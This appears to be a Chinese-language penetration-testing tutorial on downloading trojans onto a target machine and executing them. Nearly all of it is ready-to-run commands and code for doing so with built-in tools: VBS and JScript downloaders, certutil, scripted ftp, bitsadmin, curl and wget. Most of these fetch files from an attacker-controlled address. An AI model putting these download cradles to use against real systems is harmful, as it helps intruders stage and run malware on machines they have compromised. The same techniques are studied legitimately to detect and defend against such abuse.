本文主要讲述如何将各种木马下载到目标机器,然后进行执行,以便进行下一步的执行。
寻找目录
下载木马到目标主机,首先对应文件夹要有写权限吧,那你想执行得有执行权限吧,所以
icacls directory /t:检查目录地下子目录以及档案的权限
具体可以参考https://dotblogs.com.tw/ghoseliang/2013/03/04/95113
vbs下载木马
VBS是基于Visual Basic的脚本语言。VBS的全称是:Microsoft Visual Basic Script Edition。(微软公司可视化BASIC脚本版)。其语言类似Visual Basic(VB),脚本语言的特点为:简单易学
任何windows系统版本均支持vbs脚本语言的,即然是自家的东西,支持也就不奇怪。
有参数
set a=createobject("adod"+"b.stream"):set w=createobject("micro"+"soft.xmlhttp"):w.open "get",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2
命令
cscript downfile.vbs http://192.168.1.115/robots.txt C:\Inetpub\b.txt
无参数VBS
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://192.168.74.35/1.txt",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "C:\install\2.txt",2
Certutil.exe
Certutil.exe是一个命令行程序,作为证书服务的一部分安装。您可以使用Certutil.exe转储和显示证书颁发机构(CA)配置信息,配置证书服务,备份和还原CA组件以及验证证书,密钥对和证书链。
命令
certutil.exe -urlcache -split -f http://192.168.1.115/robots.txt
certutil.exe -urlcache -split -f http://192.168.1.115/robots.txt delete //有缓存,删除缓存
ftp
echo open 192.168.1.115 21> ftp.txt
echo 123>> ftp.txt //user
echo 123>> ftp.txt //password
echo binary >> ftp.txt //bin模式
echo get robots.txt >> ftp.txt
echo bye >> ftp.txt
bitsadmin
BITSAdmin是一个命令行工具,可用于创建下载或上传并监视其进度。
自 windows7 以上版本内置 bitsadmin,它可以在网络不稳定的状态下下载文件,出错会自动重试,在比较复杂的网络环境下,有着不错的性能。
bitsadmin /rawreturn /transfer down "http://192.168.1.115/robots.txt" E:\PDF\robots.txt
需要注意的是,bitsadmin要求服务器支持Range标头。
如果需要下载过大的文件,需要提高优先级。配合上面的下载命令。再次执行
bitsadmin /setpriority down foreground
而且一定要加上路径
js
windows 全平台支持js
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1;
BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("micropoor.exe"); //保存的文件名
curl
curl windows、Linux 平台自带
下载文件并使用相同名称保存使用-O
curl -O https://testdomain.com/testfile.tar.gz
下载文件并使用自定义名称保存,使用-o
curl -o custom_file.tar.gz https://testdomain.com/testfile.tar.gz
可以一起下载多个文件,虽然不推荐
curl -O https://testdomain.com/testfile.tar.gz -O https://testdomain.com/testfile2.tar.gz
curl 下载时可以再文件前面添加路径来写入,但是由于部分路径对权限有要求,所以对与curl 并不能成功创建文件
wget
wget 一般存在与Linux 平台。
使用wget -O下载并以不同的文件名保存
wget -O wordpress.zip http://www.minjieren.com/download.aspx?id=1080
参考
https://micro8.gitbook.io/micro8
https://www.freebuf.com/articles/network/247980.html
https://blog.csdn.net/jhsword/article/details/95954230
https://dotblogs.com.tw/ghoseliang/2013/03/04/95113